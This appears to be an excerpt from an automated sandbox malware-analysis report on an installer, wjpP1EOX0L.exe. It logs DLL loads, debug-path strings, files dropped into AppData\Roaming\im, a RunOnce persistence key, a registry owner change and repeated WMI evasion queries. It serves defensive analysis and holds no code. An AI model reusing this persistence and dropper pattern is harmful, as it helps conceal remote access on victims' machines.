                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp
Section loaded: wintypes.dll, windows.storage.dll, wldp.dll, profapi.dll, shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\wjpP1EOX0L.exe
Section loaded: uxtheme.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
Section loaded: msimg32.dll, version.dll, mpr.dll, uxtheme.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, windows.storage.dll, wldp.dll, profapi.dll, shfolder.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, textshaping.dll, sspicli.dll, dwmapi.dll, sfc.dll, sfc_os.dll, explorerframe.dll
Source: C:\Windows\SysWOW64\cmd.exe
Section loaded: cmdext.dll, apphelp.dll
Source: C:\Windows\SysWOW64\xcopy.exe
Section loaded: ulib.dll, ifsutil.dll, devobj.dll, fsutilext.dll, ntmarta.dll
Source: C:\Users\user\AppData\Roaming\im\ast.exe
Section loaded: version.dll, mpr.dll, olepro32.dll, wininet.dll, wsock32.dll, wtsapi32.dll, winmm.dll, netapi32.dll, shfolder.dll, userenv.dll, sqlite3.dll, iphlpapi.dll, crtdll.dll, msacm32.dll, quartz.dll, msvfw32.dll, avifil32.dll, winmmbase.dll, wkscli.dll, logoncli.dll, netutils.dll, samcli.dll, winhttp.dll, sspicli.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, colorui.dll, mscms.dll, coloradapterclient.dll, compstui.dll, msimg32.dll, inetres.dll, windowscodecs.dll, propsys.dll, profapi.dll, dwmapi.dll, security.dll, secur32.dll, winsta.dll, scrrun.dll, sxs.dll, dbghelp.dll, dbgcore.dll, cscapi.dll, d3d11.dll, dxgi.dll, astcrp.dll, libssl-1_1.dll, libcrypto-1_1.dll, vcruntime140.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, amsi.dll, textshaping.dll, powrprof.dll, umpdc.dll, dataexchange.dll, dcomp.dll, twinapi.appcore.dll, iertutil.dll, ondemandconnroutehelper.dll, winnsi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, symsrv.dll, urlmon.dll, srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\xcopy.exe
File written: C:\Users\user\AppData\Roaming\im\config.ini
Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp
Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp
Window found: window name: TMainForm
Source: Window Recorder
Window detected: More than 3 window changes detected
Source: wjpP1EOX0L.exe
Static file information: File size 6810986 > 1048576
Source: wjpP1EOX0L.exe
Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2089288252.00000000035B2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2999895866.000000006BE30000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\libeay32.pdb source: xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdb source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdb source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\Projects\Delphi\_Assistant\10_FSTEK_02\00_Bin\Hatls.pdbf source: xcopy.exe, 00000009.00000003.2088110800.00000000035D3000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3005322508.000000006C482000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdb source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstRct.pdbM6 source: xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3002416551.000000006C1CF000.00000002.00000001.01000000.00000011.sdmp, astrct.dll.9.dr
                          Source: Binary string: vcruntime140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: vcruntime140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385212736.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3008128485.000000006F701000.00000020.00000001.01000000.00000015.sdmp
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\libjpeg-turbo-win.pdb! source: xcopy.exe, 00000009.00000003.2096624002.000000000341C000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdbGCTL source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\CFILES\Projects\WinSSL\openssl-1.1.0g\libcrypto-1_1.pdb source: xcopy.exe, 00000009.00000003.2094846139.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, is-VCJTB.tmp.3.dr
                          Source: Binary string: msvcr120.i386.pdb source: xcopy.exe, 00000009.00000003.2097728621.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, msvcr120.dll.9.dr
                          Source: Binary string: D:\ProjectsVS2015\!Ast_SVN\00_Bin\AstClient.pdbe source: ast.exe, 0000000A.00000002.3007667489.000000006CFB3000.00000002.00000001.01000000.0000000F.sdmp, is-951GK.tmp.3.dr
                          Source: Binary string: C:\OpenSSL\Temp\openssl-1.0.2u-x32\out32dll\ssleay32.pdb@W source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: .pdbnes\AppData\Roaming\im\ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb@@ source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb\*D{ source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: vcomp140.i386.pdb source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385162742.00000000033F8000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: D:\ProjectsVS2015\OpenSSL\openssl-1.1.1l\libssl-1_1.pdb source: xcopy.exe, 00000009.00000003.2097505417.0000000003418000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3006758328.000000006CA31000.00000002.00000001.01000000.00000013.sdmp, is-UA1D6.tmp.3.dr
                          Source: Binary string: C:\Users\user\AppData\Roaming\im\ast.pdb source: ast.exe, 0000000A.00000002.2978052448.000000000019A000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASMOpenSSL 1.1.1l 24 Aug 2021built on: Tue Sep 7 07:24:19 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not availabledes(long) source: ast.exe, 0000000A.00000002.2999895866.000000006BDC7000.00000002.00000001.01000000.00000014.sdmp
Source: C:\Users\user\AppData\Roaming\im\ast.exe
Code function: 10_2_6B90AE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B90AE50
Source: is-4POLO.tmp.3.dr
Static PE information: section name: .rodata
Source: is-82POG.tmp.3.dr
Static PE information: section name: .textbss
Static PE information: section name: .msvcjmc
Static PE information: section name: .00cfg
Source: is-SD6OU.tmp.3.dr
Static PE information: section name: .00cfg
Source: is-UA1D6.tmp.3.dr
Static PE information: section name: .00cfg
Source: is-ND9BQ.tmp.3.dr
Static PE information: section name: .code
Source: quartz.dll.9.dr
Static PE information: section name: .code
Source: astrct.dll.9.dr
Static PE information: section name: .rodata
Source: hatls.dll.9.dr
Static PE information: section name: .textbss
Static PE information: section name: .msvcjmc
Static PE information: section name: .00cfg
Source: libcrypto-1_1.dll.9.dr
Static PE information: section name: .00cfg
Source: libssl-1_1.dll.9.dr
Static PE information: section name: .00cfg
Source: C:\Users\user\AppData\Roaming\im\ast.exe
Code function: 10_2_6B939F78 push ecx; ret 10_2_6B939F76
Source: is-88TFK.tmp.3.dr
Static PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.9.dr
Static PE information: section name: .text entropy: 6.95576372950548
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-2G518.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-VCJTB.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-KGLTC.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\aw_sas32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\quartz.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libjpeg-turbo-win.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-951GK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\astclient.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\msvcr120.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\quartz.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libssl-1_1.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-PDD2G.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\aw_sas32.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\AstCrp.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\opus.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-82POG.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libcryptoMD.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\hatls.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\hatls.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_setup64.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\ast.exe (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libcryptoMD.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libcurl.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\msvcr120.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-88TFK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-JCPUK.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libeay32.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libcrypto-1_1.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-5IUGA.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libjpeg-turbo-win.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\astrct.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libeay32.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\astclient.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libssl-1_1.dllJump to dropped file
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-SD6OU.tmpJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\ast.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\AstCrp.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-UA1D6.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-4POLO.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\astrct.dll (copy)Jump to dropped file
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile created: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-2EBQK.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\libcrypto-1_1.dll (copy)Jump to dropped file
                          Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Roaming\im\libcurl.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\is-ND9BQ.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\Temp\mo6x\opus.dll (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce asg
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Users\user\AppData\Roaming\im\ast.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE Caption='C:'
